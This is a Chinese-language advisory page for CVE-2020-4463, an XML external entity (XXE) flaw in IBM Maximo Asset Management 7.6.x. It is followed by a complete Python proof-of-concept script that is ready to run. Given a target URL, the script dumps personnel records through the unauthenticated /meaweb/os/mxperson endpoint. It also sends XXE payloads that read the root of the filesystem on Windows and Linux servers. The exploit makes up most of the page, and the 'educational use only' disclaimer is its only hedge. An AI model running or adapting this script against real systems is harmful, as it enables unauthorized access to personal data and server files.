在处理XML数据时,IBM Maximo Asset Management容易受到XML外部实体注入(XXE)攻击。远程攻击者可能利用此漏洞来泄露敏感信息或消耗内存资源。
受影响的核心组件:
- IBM Maximo资产管理7.6.0
- IBM Maximo资产管理7.6.1
- IBM Maximo资产管理7.6.0之前的所有版本
CVE-2020-4463-PoC:
#!/usr/bin/python3
############
# @Author Ibonok
#
# CVE-2020-4463 IBM Maximo XXE
#
# Do not use this in productiv enviroments.
# For educational use only.
#
############
from colorama import init, Fore, Style
import sys
import requests
import argparse
def dataeleak_example(url):
# Mandatory Headers
headers = {'Content-Type': 'application/xml'}
basepath = "/meaweb/os/mxperson"
# DUMP MXPERSON
xml_query = """<?xml version='1.0' encoding='UTF-8'?>
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
<max:MXPERSONQuery>
</max:MXPERSONQuery>
</max:QueryMXPERSON>"""
print (requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)
def xxe_example(url):
# Mandatory Headers
headers = {'Content-Type': 'application/xml'}
basepath = "/meaweb/os/mxperson"
# XXE Windows
xml_query = """<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///c:/">
]>
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
<max:MXPERSONQuery>
<max:PERSON>
<max:PERSONUID>&xxe;</max:PERSONUID>
</max:PERSON>
</max:MXPERSONQuery>
</max:QueryMXPERSON>"""
print (requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)
# XXE Linux
xml_query = """<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///">
]>
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
<max:MXPERSONQuery>
<max:PERSON>
<max:PERSONUID>&xxe;</max:PERSONUID>
</max:PERSON>
</max:MXPERSONQuery>
</max:QueryMXPERSON>"""
print (requests.post(url + basepath, data=xml_query, headers=headers, verify=False).text)
def check_args ():
init(autoreset=True)
pars = argparse.ArgumentParser(description=Fore.GREEN + Style.BRIGHT + 'CVE-2020-4463 PoC Data Leakage and XXE' + Style.RESET_ALL)
pars.add_argument('-x', '--xxe', nargs='?', type=str2bool, default=False, const=True, help='XXE (Linux/Windows)')
pars.add_argument('-d', '--dataleak', nargs='?', type=str2bool, default=False, const=True, help='Data Leakage REST request MXPERSON. May take a long time.')
pars.add_argument('--url', nargs='?', help='Target URL http://, https://')
args = pars.parse_args()
if args.url is None:
pars.error(Fore.RED + '--url required')
elif args.url and args.xxe is False and args.dataleak is False:
pars.error(Fore.RED + '-x/-xxe, or -d/--dataleak is missing')
elif args.url and args.xxe:
return args.url, args.xxe, args.dataleak
elif args.url and args.dataleak:
return args.url, args.xxe, args.dataleak
elif args.url and args.xxe and args.dataleak:
pars.error(Fore.RED + 'To many Parameters, please check --help')
def single_url(url, xxe, dataleak):
if dataleak:
dataeleak_example ( url)
elif xxe:
xxe_example ( url)
else:
sys.exit()
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
if __name__ == "__main__":
try:
(url, xxe, dataleak) = check_args()
single_url(url, xxe, dataleak)
except KeyboardInterrupt:
sys.exit()
如果您收到以下响应,则两个漏洞均不存在。
Error 500: BMXAA1268E - No user credentials.
ref: